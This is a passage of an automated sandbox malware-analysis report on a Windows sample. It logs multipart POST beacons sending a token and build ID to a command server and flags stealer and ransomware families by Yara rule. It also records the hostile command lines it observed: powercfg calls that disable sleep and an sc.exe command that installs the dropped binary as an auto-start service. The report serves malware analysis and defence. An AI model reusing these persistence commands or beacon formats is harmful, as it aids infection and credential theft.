34 59 56 31 73 58 6a 45 44 54 6d 6c 61 4a 66 74 6b 65 50 6b 4a 49 56 78 6b 41 6b 45 Data Ascii: Q80UHmigoTPFJ1pTSUDCkpabQAUd6Wk6UDEoo6UZoGIaSlzSH/8AVQMKSj3oPWgYdqTrQaO/WgA/z1pM/wCTQaKChKD+VHagdqADPXNIT9TRnmjNAxMY70Uv6++KQUDE70GgGigAPWkzQOtB6UDPQ6WmFsbPlc738tCFJ3Px8o9TyOPenNlVlLI4EJxLlD8hzj5vTnjmsuePc+V9nO17Mmt7ma0nWaCQpIp4YV1sXjEDTmlaJftkePkJIVxkAkE
2024-08-10 14:13:11 UTC	1041	OUT	Data Raw: 74 63 77 58 6c 78 71 30 6b 47 71 61 76 70 36 5a 6e 49 38 74 47 69 48 56 43 4e 77 59 73 51 57 47 54 6e 4f 53 4b 34 50 78 66 61 54 32 48 69 2f 56 72 57 36 75 2f 74 64 78 48 63 75 4a 4c 6a 79 78 48 35 72 5a 79 57 32 6a 67 5a 39 4b 71 32 65 76 61 78 70 31 31 50 64 57 4f 72 58 39 74 63 58 42 4a 6d 6d 67 75 58 52 35 43 54 6e 35 69 44 6b 38 38 38 31 52 6c 6b 6b 6d 6c 65 57 57 52 70 4a 48 59 73 37 75 63 6c 69 65 53 53 65 35 6f 53 47 32 4d 72 72 66 41 4e 35 4e 42 71 65 6f 57 30 66 6c 69 4f 34 30 32 37 45 68 4d 53 6c 73 43 43 51 67 42 69 4e 79 6a 50 58 42 47 65 4d 35 72 6b 71 6d 67 75 4a 37 57 51 79 57 38 30 6b 4c 6c 57 51 74 47 78 55 6c 57 47 43 4f 4f 78 42 49 49 39 44 51 78 48 70 38 50 6e 4e 6f 63 65 6b 52 37 32 30 69 54 77 73 31 30 59 4f 66 4c 4e 7a 35 68 77 2b Data Ascii: tcwXlxq0kGqavp6ZnI8tGiHVCNwYsQWGTnOSK4PxfaT2Hi/VrW6u/tdxHcuJLjyxH5rZyW2jgZ9Kq2evaxp11PdWOrX9tcXBJmmguXR5CTn5iDk8881RlkkmleWWRpJHYs7uclieSSe5oSG2MrrfAN5NBqeoW0fliO4027EhMSlsCCQgBiNyjPXBGeM5rkqmguJ7WQyW80kLlWQtGxUlWGCOOxBII9DQxHp8PnNocekR720iTws10YOfLNz5hw+
2024-08-10 14:13:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:13:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:13:13 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49798	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:13:14 UTC	305	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKKJEBFIDAEBFHIDAEB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:13:14 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------FBKKJEBFIDAEBFHIDAEBCont
2024-08-10 14:13:15 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:13:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:13:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49799	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:13:16 UTC	305	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:13:16 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------BGCAFHCAKFBFIECAFIIJCont
2024-08-10 14:13:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:13:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:13:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	49823	188.114.96.3	443

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:14:08 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-08-10 14:14:09 UTC	895	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:14:09 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kBXFewfvC61g4fNarHfU%2FB%2Fn5fjya4aa985XwCvq6DYuW4f1rj17N1%2Fb%2F25uESV1zj7Ek5%2Fubi1TYrA%2FqVmQyAxVfzFHsSglssR31NtiEJPoUe6YA4ziyPc6RoMl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b1097313ddc19b6-EWR alt-svc: h3=":443"; ma=86400
2024-08-10 14:14:09 UTC	418	IN	Data Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
2024-08-10 14:14:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	10:12:01
Start date:	10/08/2024
Path:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe"
Imagebase:	0x7ff6e6930000
File size:	4'467'712 bytes
MD5 hash:	A412795F68E5DAE5FBAE528595B96916
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:12:05
Start date:	10/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:12:05
Start date:	10/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:12:05
Start date:	10/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	10:12:37
Start date:	10/08/2024
Path:	C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe
Imagebase:	0x400000
File size:	7'644'814 bytes
MD5 hash:	381F228FC02E9927F1F2145B8AD5696E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	10:12:37
Start date:	10/08/2024
Path:	C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe
Imagebase:	0x980000
File size:	529'408 bytes
MD5 hash:	B8D875D94FBD7DF91B1DBBBC308A057F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.3000839541.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	10:12:37
Start date:	10/08/2024
Path:	C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe
Imagebase:	0x3a0000
File size:	964'096 bytes
MD5 hash:	F5B93D3369D1AE23D6E150E75D2B6A80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000009.00000002.2830297717.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.2801068038.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000009.00000002.2703688839.0000000002491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 75%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:12:37
Start date:	10/08/2024
Path:	C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe
Imagebase:	0x400000
File size:	746'496 bytes
MD5 hash:	D7528CD33B73718B5949277420681F90
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.2963054220.0000000000647000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:12:37
Start date:	10/08/2024
Path:	C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe
Imagebase:	0xa20000
File size:	11'649'536 bytes
MD5 hash:	45C0D8BEDD6BFF145CBE1C3064F2CF56
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2186305168.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe, Author: Joe Security
Antivirus matches:	Detection: 62%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:12:37
Start date:	10/08/2024
Path:	C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe
Imagebase:	0x140000000
File size:	10'590'720 bytes
MD5 hash:	488D85695B6E76307AA595F8DB6A48FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 67%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:12:37
Start date:	10/08/2024
Path:	C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe
Imagebase:	0x8a0000
File size:	6'332'416 bytes
MD5 hash:	67D39F0CBBAB44B99FFFAF3A408B2088
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe, Author: Joe Security
Antivirus matches:	Detection: 38%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:12:37
Start date:	10/08/2024
Path:	C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe
Imagebase:	0x630000
File size:	6'753'792 bytes
MD5 hash:	F46974F39AEBF4F4D039600F3881D6B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe, Author: Joe Security
Antivirus matches:	Detection: 21%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:12:37
Start date:	10/08/2024
Path:	C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe
Imagebase:	0x400000
File size:	3'097'600 bytes
MD5 hash:	BA027CCB7DE0F4A3769F48136D183DBD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:12:39
Start date:	10/08/2024
Path:	C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe
Imagebase:	0x6c0000
File size:	529'408 bytes
MD5 hash:	B8D875D94FBD7DF91B1DBBBC308A057F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.2467637502.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2547476892.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2547476892.0000000002D43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:12:40
Start date:	10/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xbf0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2691859636.00000000004DD000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2691859636.00000000004DF000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2691859636.000000000047C000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2723255959.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:12:40
Start date:	10/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	10:12:41
Start date:	10/08/2024
Path:	C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe
Wow64 process (32bit):	true
Commandline:	.\Install.exe
Imagebase:	0x400000
File size:	6'690'042 bytes
MD5 hash:	2679FAC73DF5510DE7D16E88EDD0EE31
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	10:12:41
Start date:	10/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xa60000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:12:44
Start date:	10/08/2024
Path:	C:\Program Files (x86)\NetVoyager\nv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\NetVoyager\nv.exe"
Imagebase:	0x400000
File size:	3'097'600 bytes
MD5 hash:	BA027CCB7DE0F4A3769F48136D183DBD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	10:12:44
Start date:	10/08/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff74bae0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:12:44
Start date:	10/08/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff74bae0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:12:44
Start date:	10/08/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff74bae0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:12:44
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:12:44
Start date:	10/08/2024
Path:	C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe
Wow64 process (32bit):	true
Commandline:	.\Install.exe /qiFwdidsyGaM "525403" /S
Imagebase:	0x500000
File size:	7'031'296 bytes
MD5 hash:	83D1F62BB73920D3D4603BE2EEAB0192
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	10:12:44
Start date:	10/08/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff74bae0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:12:44
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:12:44
Start date:	10/08/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe delete "VIFLJRPW"
Imagebase:	0x7ff740650000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:12:44
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:12:44
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:12:44
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	10:12:45
Start date:	10/08/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe create "VIFLJRPW" binpath= "C:\ProgramData\xprfjygruytr\etzpikspwykg.exe" start= "auto"
Imagebase:	0x7ff740650000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
